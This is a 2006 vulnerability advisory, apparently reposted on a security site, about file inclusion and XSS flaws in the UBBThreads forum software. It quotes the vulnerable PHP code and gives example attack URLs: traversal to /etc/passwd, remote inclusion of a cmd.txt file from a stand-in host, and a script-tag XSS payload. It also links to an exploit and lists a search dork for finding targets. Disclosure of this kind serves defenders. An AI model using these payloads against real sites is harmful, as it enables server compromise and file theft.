UBBThreads 5.x,6.x Multiple File InclusionVulnerabilities.

2006-05-30 / 2006-05-31
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

--Security Report-- Advisory: UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities. --- Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI --- Date: 27/05/06 09:44 PM --- Contacts:{ ICQ: 10072 MSN/Email: nukedx (at) nukedx (dot) com [email concealed] Web: http://www.nukedx.com } --- Vendor: Infopop (http://www.infopop.com/) Version: 5.x and 6.x also prior versions must be affected. About: Via this methods remote attacker can include arbitrary files to UBBThreads.The thispath and configdir in ubbt.inc.php did not sanitized before using it.You can find vulnerable code in ubbt.inc.php at lines 23-42 -Source in ubbt.inc.php- 23: if (!$configdir) { 24: $configdir = $thispath; 25: } 26: 27: // ------------------------------------------------------------------ 28: // In case register globals are on we need to protect a few variables 29: if ( 30: isset($HTTP_GET_VARS['thispath']) 31: || isset($HTTP_POST_VARS['thispath']) 32: || isset($HTTP_COOKIE_VARS['thispath']) 33: || isset($HTTP_POST_FILES['thispath']) 34: || isset($HTTP_GET_VARS['configdir']) 35: || isset($HTTP_POST_VARS['configdir']) 36: || isset($HTTP_COOKIE_VARS['configdir']) 37: || isset($HTTP_POST_FILES['configdir']) ) 38: { 39: exit; 40: } 41: 42: include("$configdir/config.inc.php"); -End of source- So if register_globals on remote attacker could inject arbitrary variable by GLOBALS[thispath]. Also if php <= 4.1.0 there is no $HTTP_* tags so remote attacker can use thispath in QueryString.This works on version 6.x For version 5.x there is no variable check in ubbt.inc.php so remote attacker can inject thispath to QueryString and include external and internal files. Including internal files requires that magic_quotes_gpc off. There is another inclusion vulnerability in includepollresults.php for version 6.x. Parameters config[cookieprefix] and w3t_language did not sanitized properly before using them.So it lets remote attacker can include arbitrary internal files. You can find vulnerable code in includepollresults.php at lines 24 -Source code in includepollresults.php- 24: require ("languages/${$config['cookieprefix']."w3t_language"}/includepollresults .php"); -End of source- There is also XSS vulnerability in all pages.If debug parameter sent by QueryString it lets remote attacker make a malicious links for clicking and execute arbitrary HTML/JS/VBS etc.. codes in victim's browser. Level: Highly Critical --- How&Example: Succesful exploitation register_globals on Version 6.x GET -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t _language=[FILE] EXAMPLE -> http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t _language=../../../../../etc/passwd%00 GET -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE] EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.c om/cmd.txt? EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00 If php version < 4.1.0 or UBB version <= 5.x GET -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE] EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.tx t? EXAMPLE -> http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00 XSS: GET -> http://[site]/[ubbpath]/index.php?debug=[XSS] EXAMPLE -> http://[site]/[ubbpath]/index.php?debug=<script>alert();</script> --- Timeline: * 27/05/2006: Vulnerability found. * 27/05/2006: Contacted with vendor and waiting reply. --- Exploit: http://www.nukedx.com/?getxpl=40 --- Original advisory can be found at: http://www.nukedx.com/?viewdoc=40 --- Dorks: "UBB.threads??"


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top